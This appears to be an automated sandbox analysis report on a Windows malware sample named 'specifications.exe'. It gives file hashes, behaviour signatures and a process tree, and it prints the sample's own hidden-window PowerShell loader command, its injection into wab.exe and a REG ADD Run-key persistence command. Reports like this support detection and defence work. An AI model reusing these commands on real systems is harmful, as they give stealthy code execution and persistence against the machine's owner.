Analysis
- max time kernel: 146s
- max time network: 140s
- platform: windows7_x64
- resource: win7-20240611-en
- resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
- submitted: 13-06-2024 15:47

Static task: static1
Behavioral task: behavioral1
  Sample: specifications.exe
  Resource: win7-20240611-en
Behavioral task: behavioral2
  Sample: specifications.exe
  Resource: win10v2004-20240611-en
General
- Target: specifications.exe
- Size: 990KB
- MD5: 54e257b56a256a2f1b062d2cebda6b2d
- SHA1: 4c4d8ddc6afce07f623b256fb21638cbdbd16144
- SHA256: 4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545
- SHA512: 6f8e30f1b11fee49461691fd1d74de2dfe1c6f64c369d59632cb9e862ba3c3d0abab329e3134f5adcc066ee26f00f96ce303e1f5cdc318969698a7ce99261fce
- SSDEEP: 24576:/4ezTAAfvu9z/4Jy7WjTfmzKnsWhegcKyJI:/4WAAfIgNjT+KnsWhegcXG
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell and hides the display window.
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
    reg.exe - Set value (str): \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\Dugens = "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\\Imbodying\\').Swails;%Spontan59% ($Taarepersede)"
- Drops file in System32 directory (1 IoC)
  Processes:
    specifications.exe - File opened for modification: C:\Windows\SysWOW64\driftschefernes.ini
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes:
    1896 powershell.exe
    2544 wab.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    1896 powershell.exe set thread context of 2544 wab.exe
- Drops file in Program Files directory (2 IoCs)
  Processes:
    specifications.exe - File created: C:\Program Files (x86)\Common Files\twig\Monetising.lnk
    specifications.exe - File opened for modification: C:\Program Files (x86)\inspiredly.snu
- Drops file in Windows directory (1 IoC)
  Processes:
    specifications.exe - File opened for modification: C:\Windows\Fonts\undispersing\frelserens.ini
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry key (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes:
    1896 powershell.exe (8 entries)
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes:
    1896 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    1896 powershell.exe - Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes:
    2424 specifications.exe wrote to memory of 1896 powershell.exe (4 entries)
    1896 powershell.exe wrote to memory of 2740 cmd.exe (4 entries)
    1896 powershell.exe wrote to memory of 2544 wab.exe (6 entries)
    2544 wab.exe wrote to memory of 2632 cmd.exe (4 entries)
    2632 cmd.exe wrote to memory of 2520 reg.exe (4 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\specifications.exe (PID 2424)
  Command line: "C:\Users\Admin\AppData\Local\Temp\specifications.exe"
  Signatures: Drops file in System32 directory; Drops file in Program Files directory; Drops file in Windows directory; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1896)
    Command line: "powershell.exe" -windowstyle hidden "$Nondenunciation=Get-Content 'C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Personalhistoriker\millionren.Non';$Tabinet=$Nondenunciation.SubString(50736,3);.$Tabinet($Nondenunciation)"
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 2740)
      Command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    - C:\Program Files (x86)\windows mail\wab.exe (PID 2544)
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      Signatures: Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 2632)
        Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dugens" /t REG_EXPAND_SZ /d "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\Imbodying\').Swails;%Spontan59% ($Taarepersede)"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\reg.exe (PID 2520)
          Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dugens" /t REG_EXPAND_SZ /d "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\Imbodying\').Swails;%Spontan59% ($Taarepersede)"
          Signatures: Adds Run key to start application; Modifies registry key
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Personalhistoriker\millionren.Non
  Filesize: 49KB
  MD5: 80157482bbee05d39cc6eb150df00ee5
  SHA1: 541958b59d496ae8814c09336eda330993db754c
  SHA256: 4c2726ecd1f509ea66be91622735c2b9885c232c3b3733390e46d2859b2aed0b
  SHA512: 82f62f244fe0690c68b4eb983e1bd5ae421a5f10cf12d281a9dc167d9b99f60ea4dcac573f05626e5fc41ae50d18754029eae3f677806a83dfd7a801bda61c16
- C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Straalerne.Now
  Filesize: 299KB
  MD5: 74633979df571bd25e1c1e87f24becf7
  SHA1: e2cb97f7015f6e49dde64f15f9c78607b32797e2
  SHA256: a6bc8292d47989709e989e8f32243c7b42ca38879ec19ffec6376a69e2d0cf4f
  SHA512: 6dcae3ca303a709d3ad2e9c1ce90836ad84bdd49c5e0a78fc066c1e31493525a71f04b0a39e5593db953fe6f8c5e84b421a8c5a20814d01933c1bd41b1341f31
- memory/1896-8-0x0000000073CE1000-0x0000000073CE2000-memory.dmp (Filesize: 4KB)
- memory/1896-9-0x0000000073CE0000-0x000000007428B000-memory.dmp (Filesize: 5.7MB)
- memory/1896-10-0x0000000073CE0000-0x000000007428B000-memory.dmp (Filesize: 5.7MB)
- memory/1896-11-0x0000000073CE0000-0x000000007428B000-memory.dmp (Filesize: 5.7MB)
- memory/1896-15-0x0000000006470000-0x000000000A3C7000-memory.dmp (Filesize: 63.3MB)
- memory/1896-16-0x0000000073CE0000-0x000000007428B000-memory.dmp (Filesize: 5.7MB)
- memory/2544-17-0x00000000002D0000-0x0000000001332000-memory.dmp (Filesize: 16.4MB)